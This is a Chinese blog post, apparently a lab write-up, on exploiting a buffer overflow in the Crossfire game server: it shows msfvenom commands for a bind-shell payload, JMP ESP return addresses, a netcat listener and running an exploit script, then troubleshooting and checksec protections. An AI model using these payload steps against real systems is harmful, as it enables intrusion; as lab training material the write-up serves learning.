

  <!DOCTYPE html>
  <html lang="en" data-default-color-scheme=&#34;dark&#34; >
  <style>
    .text1
    {
    text-shadow: 0px 0px 2px #f2f3f2;
    }
    </style>

  

<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/null">
  <link rel="icon" type="image/png" href="/null">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>crossfire&amp;linux缓冲区溢出案例（四） - whale3070&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.7","typing":{"enable":false,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


    <body>
      <header style="height: 70vh;">
        <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>InfoSec learning</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          
        
      </ul>
    </div>
  </div>
</nav>

          <div class="banner" id="banner" false
            style="background: url('/img/default.png') no-repeat center center;
              background-size: cover;">
              <div class="full-bg-img">
                <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
                  <div class="page-header text-center fade-in-up">
                    <span class="h2 text1" id="subtitle" title="crossfire&linux缓冲区溢出案例（四）">
                      
                        crossfire&linux缓冲区溢出案例（四）
                      
                    </span>
        
                    
                      <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-02-05 00:00" pubdate>
        February 5, 2020 am
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      760 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      10
       分钟
    </span>
  

  
  
</div>

                    
                  </div>
                    
                  </div>
                  
                </div>
              </div>
          </div>
      </header>

      <main>
        
          

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">crossfire&amp;linux缓冲区溢出案例（四）</h1>
            
            <div class="markdown-body">
              <p>参考资料：<a target="_blank" rel="noopener" href="https://introspelliam.github.io/2017/09/30/linux%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%B8%B8%E7%94%A8%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/">linux程序的常用保护机制</a></p>
<p>上一篇：<a target="_blank" rel="noopener" href="https://whale3070.github.io/buffer%20overflow/2020/01/28/12-x/">crossfire&amp;linux缓冲区溢出案例（三）</a></p>
<h2 id="生成shellcode"><a href="#生成shellcode" class="headerlink" title="生成shellcode"></a>生成shellcode</h2><p>上一篇找到了这些坏字符，在生成shellcode的时候必须避免这些字符出现<code>\x00\x09\x0a\x20</code></p>
<figure class="highlight stylus"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs stylus"><span class="hljs-selector-attr">[目标主机ip-linux]</span> <span class="hljs-number">192.168</span>.<span class="hljs-number">67.128</span><br><span class="hljs-selector-attr">[攻击机ip]</span>         <span class="hljs-number">192.168</span>.<span class="hljs-number">67.1</span><br><br>msfvenom -<span class="hljs-selector-tag">p</span> linux/x86/shell_bind_tcp LPORT=<span class="hljs-number">4444</span> -f c -<span class="hljs-selector-tag">b</span><br><span class="hljs-string">&quot;\x00\x09\x0a\x20&quot;</span> –e x86/shikata_ga_nai<br><br>msfvenom -<span class="hljs-selector-tag">p</span> linux/x86/shell_bind_tcp LPORT=<span class="hljs-number">4444</span> -f python -<span class="hljs-selector-tag">b</span> <span class="hljs-string">&quot;\x00\x09\x0a\x20&quot;</span> –e x86/shikata_ga_nai<br></code></pre></div></td></tr></table></figure>

<h2 id="寻找返回地址"><a href="#寻找返回地址" class="headerlink" title="寻找返回地址"></a>寻找返回地址</h2><p>现在我们知道要到达ESP寄存器指向的缓冲区，我们需要找到一条指令，例如<code>JMP ESP</code>，它将把我们带到ESP寄存器指向的地址。 </p>
<h3 id="edb"><a href="#edb" class="headerlink" title="edb"></a>edb</h3><p>Evans Debugger具有简单的操作码搜索功能。ctrl + o 快捷键搜索操作码</p>
<figure class="highlight awk"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs awk">[目标机执行bof程序]edb --run <span class="hljs-regexp">/usr/g</span>ames<span class="hljs-regexp">/crossfire/</span>bin/crossfire<br></code></pre></div></td></tr></table></figure>
<p>但是经过搜索，没有找到任何有效的跳转地址。怀疑是版本不是最新版，有bug，但是apt-get upgrade edb，报了错。</p>
<figure class="highlight apache"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs apache"><span class="hljs-attribute">The</span> following packages have unmet dependencies:<br> <span class="hljs-attribute">emacs</span>-common : Breaks: edb (&lt; <span class="hljs-number">1</span>.<span class="hljs-number">32</span>) but <span class="hljs-number">1</span>.<span class="hljs-number">31</span>-<span class="hljs-number">3</span> is to be installed<br><span class="hljs-attribute">E</span>: Broken packages<br></code></pre></div></td></tr></table></figure>
<p>放弃使用edb来查找跳转指令。</p>
<h3 id="msfelfscan"><a href="#msfelfscan" class="headerlink" title="msfelfscan"></a>msfelfscan</h3><p>如果运行msfelfscan提示命令未找到“ command not found” </p>
<figure class="highlight awk"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs awk">cd <span class="hljs-regexp">/usr/</span>bin<br>ln -s <span class="hljs-regexp">/usr/</span>share<span class="hljs-regexp">/framework2/m</span>sfelfscan msfelfscan<br></code></pre></div></td></tr></table></figure>
<p>msfelfscan -j esp -f  /usr/games/crossfire/bin/crossfire</p>
<figure class="highlight x86asm"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs x86asm"><span class="hljs-number">0x08134597</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br><span class="hljs-number">0x081345d7</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br><span class="hljs-number">0x08134727</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br><span class="hljs-number">0x081349c7</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br><span class="hljs-number">0x08134ad7</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br><span class="hljs-number">0x08134f87</span>   <span class="hljs-keyword">jmp</span> <span class="hljs-built_in">esp</span><br></code></pre></div></td></tr></table></figure>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight vim"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs vim">[攻击机执行命令] ./nc.<span class="hljs-keyword">exe</span> -lnvp <span class="hljs-number">4444</span><br>[攻击机] <span class="hljs-keyword">python</span> <span class="hljs-built_in">exp</span>.<span class="hljs-keyword">py</span><br></code></pre></div></td></tr></table></figure>
<p>这是exp在栈中的执行流程。<br><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/1.png" srcset="/img/loading.gif" alt="1"></p>
<h2 id="debug"><a href="#debug" class="headerlink" title="debug"></a>debug</h2><p>经过一些失败的尝试，crossfire程序还是没有成功反弹shell。<br><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/2.PNG" srcset="/img/loading.gif" alt="2"></p>
<p>SIGSEGV是非法内存访问异常</p>
<p>同样的crossfire程序，同样的exp。在官方的给的虚拟机中可以成功溢出获得shell，但是在自己的x64位linux上不能。</p>
<p><a target="_blank" rel="noopener" href="https://images.offensive-security.com/pwk-kali-vm.7z">官方给的靶机地址: pwk-kali-vm.7z</a></p>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/4.PNG" srcset="/img/loading.gif" alt="4"></p>
<p>github上有人问了同样的<a target="_blank" rel="noopener" href="https://github.com/eteran/edb-debugger/issues/724">问题</a>，但是没有答案或者解决方案</p>
<h3 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h3><p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/3.PNG" srcset="/img/loading.gif" alt="3"></p>
<figure class="highlight stata"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs stata">RELRO           <span class="hljs-keyword">STACK</span> CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable  <span class="hljs-keyword">FILE</span><br><span class="hljs-keyword">No</span> RELRO        <span class="hljs-keyword">No</span> canary found   NX enabled    <span class="hljs-keyword">No</span> PIE          <span class="hljs-keyword">No</span> RPATH   <span class="hljs-keyword">No</span> RUNPATH   2262 Symbols     <span class="hljs-keyword">No</span>     0               18      crossfire<br><br>RELRO: <span class="hljs-keyword">read</span> only relocation 尽量减少可写的存储区域<br><span class="hljs-keyword">STACK</span> CANARY ：栈保护<br>NX 将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序会尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令<br>PIE 地址空间分布随机化<br>RPATH  <br>RUNPATH     <br>Symbols        <br>FORTIFY Fortified       检查是否存在缓冲区溢出的错误<br>Fortifiable  <span class="hljs-keyword">FILE</span><br></code></pre></div></td></tr></table></figure>

<h2 id="运行crossfire的虚拟机"><a href="#运行crossfire的虚拟机" class="headerlink" title="运行crossfire的虚拟机"></a>运行crossfire的虚拟机</h2><p>未成功的机器A：<br><code>Linux kali 5.4.0-kali3-686-pae #1 SMP Debian 5.4.13-1kali1 (2020-01-20) i686 GNU/Linux</code></p>
<p>成功的虚拟机B：<br><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/5.PNG" srcset="/img/loading.gif" alt="5"></p>
<p>B机器检查“地址空间分布随机化”后，发现是开启状态，可以确定运行失败的原因跟这个无关。</p>
<figure class="highlight awk"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs awk"><span class="hljs-regexp">/proc/</span>sys<span class="hljs-regexp">/kernel/</span>randomize_va_space<br><span class="hljs-number">2</span><br></code></pre></div></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/Whale3070/Whale3070.github.io/master/images/02-05-09/6.PNG" srcset="/img/loading.gif" alt="6"><br>在成功弹shell一次后，再次运行机器B的exp，溢出就无法成功了。</p>
<p>重启后，运行exp，就能成功弹shell。</p>
<p>推测是因为溢出改变了某个内存机制？知识的匮乏导致无法继续分析。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/buffer-overflow/">buffer overflow</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/buffer-overflow/">buffer overflow</a>
                    
                  </div>
                
              </div>
              
                
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/02/07/09-x/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">查找与修改exp</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/01/30/04-x/">
                        <span class="hidden-mobile">brainpan（栈溢出）</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


            

                
                  <a id="scroll-top-button" href="#" role="button">
                    <i class="iconfont icon-arrowup" aria-hidden="true"></i>
                  </a>
                  

                    
                      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
                        

                          
      </main>

      <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://whale3070.github.io/" target="_blank" rel="nofollow noopener"><span>Whale3070</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>






  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



    </body>

  </html>